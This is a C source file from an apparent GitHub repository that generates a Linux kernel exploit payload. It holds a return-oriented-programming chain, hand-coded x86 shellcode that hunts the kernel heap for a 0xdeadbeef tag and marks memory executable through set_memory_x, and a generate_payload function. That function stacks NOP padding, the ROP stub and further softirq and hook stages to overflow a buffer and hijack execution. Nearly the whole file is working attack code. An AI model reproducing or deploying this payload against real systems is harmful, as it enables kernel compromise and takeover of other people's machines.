Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
180 lines (151 sloc) 3.73 KB
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/string.h>
#include <asm/system.h>
#include <linux/mm.h>
#include "payload.h"
#ifdef PAE
static unsigned long rop_stub[] = {
/*1*/ PUSH_ESP_POP_EAX,
/*4*/ 0xffffffff,
0xffffffff,
/*3*/ 0xffffffff,
ALIGN_EAX,
/*2*/ 0xffffffff,
0xffffffff,
/*1*/ RET,
/*4*/ POP_EDX,
0x00000004,
/*3*/ 0xffffffff,
0xffffffff,
/*2*/ 0xffffffff,
0xffffffff,
/*1*/ RET,
/*4*/ SET_MEMORY_X,
JMP_ESP,
};
#else
static unsigned long rop_stub[] = {
/*1*/ RET,
/*4*/ RET,
JMP_ESP,
}
#endif
/* Needs to be coded by hand because of the
* 7-byte constraint */
static char copy_stub[] = "\x90"
/* Find our payload on the kernel heap, using
* the tag 0xdeadbeef. We do this because
* we don't have enough room in the overflowed
* buffer to fit a payload with all the bells
* and whistles we want. */
/*2*/ "\x89\xe0" /* mov eax,esp */
"\x83\xc0\x80" /* add eax,0x80 */
/* search: */
"\x83\xc0\x04" /* add eax,0x4 */
/*1*/ "\x8b\x30" /* mov esi,DWORD PTR [eax] */
/*6*/ "\x81\xfe\xf0\xf0\xf0\xdf" /* cmp esi,0xdff0f0f0 */
"\x77\xf3" /* jg search */
/*5*/ "\x81\xfe\x80\x80\x80\xc8" /* cmp esi,0xc8808080 */
"\x72\xeb" /* jl search */
"\x90"
/*3*/ "\x66\x81\xe6\x00\xf0" /* and si,0xf000 */
"\x90\x90\x90"
/*2*/ "\xb9\x80\x20\x00\x00" /* mov ecx,0x2080 */
/* find: */
"\x46" /* inc esi */
/*3*/ "\x81\x3e\xef\xbe\xad\xde" /* cmp DWORD PTR [esi],0xdeadbeef */
"\x75\x0b" /* jne next */
"\x90"
/*1*/ "\x81\x7e\x04\xef\xbe\xad\xde" /* cmp DWORD PTR [esi+0x4],0xdeadbeef */
/*1*/ "\x90"
"\x74\x04" /* je found */
/* next: */
"\xe2\xea" /* loop find */
"\xeb\xc5" /* jmp search */
/* found: */
#ifdef PAE
/* Mark it executable */
/*1*/ "\x89\xf0"
"\x66\x25\x00\xf0" /* and ax,0xf000 */
/*2*/ "\x90\x90"
"\x2d\x00\x10\x00\x00" /* sub eax,0x1000 */
/*2*/ "\x31\xd2" /* xor edx,edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x90\x90"
/*1*/ "\xbb" /* mov ebx,&set_memory_x */
SET_MEMORY_X_CHAR
"\xff\xd3" /* call ebx */
#endif
/*1*/ "\x83\xc6\x08" /* add esi,0x8 */
"\xff\xe6" /* jmp esi */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90";
unsigned char *generate_payload(int *len)
{
extern char softirq_start;
extern char softirq_end;
extern char hook_start;
extern char hook_end;
extern char process_start;
extern char process_end;
char *payload, *p;
unsigned int copy_size;
unsigned int softirq_size;
unsigned int hook_size;
unsigned int process_size;
unsigned int total_size;
unsigned int rop_size;
rop_size = sizeof(rop_stub);
copy_size = sizeof(copy_stub)-1;
softirq_size = &softirq_end - &softirq_start;
hook_size = &hook_end - &hook_start;
process_size = &process_end - &process_start;
total_size = EIP_OFFSET + rop_size + copy_size + 8 + softirq_size +
hook_size + process_size;
payload = p = kmalloc(total_size, GFP_ATOMIC);
if (!payload) {
*len = 0;
return NULL;
}
*len = total_size;
memset(p, 0x90, EIP_OFFSET);
p += EIP_OFFSET;
memcpy(p, rop_stub, rop_size);
p += rop_size;
memcpy(p, copy_stub, copy_size);
p += copy_size;
*(unsigned int *)p = HEADER_MAGIC;
p += 4;
*(unsigned int *)p = HEADER_MAGIC;
p += 4;
memcpy(p, &softirq_start, softirq_size);
p += softirq_size;
memcpy(p, &hook_start, hook_size);
p += hook_size;
memcpy(p, &process_start, process_size);
p += process_size;
return payload;
}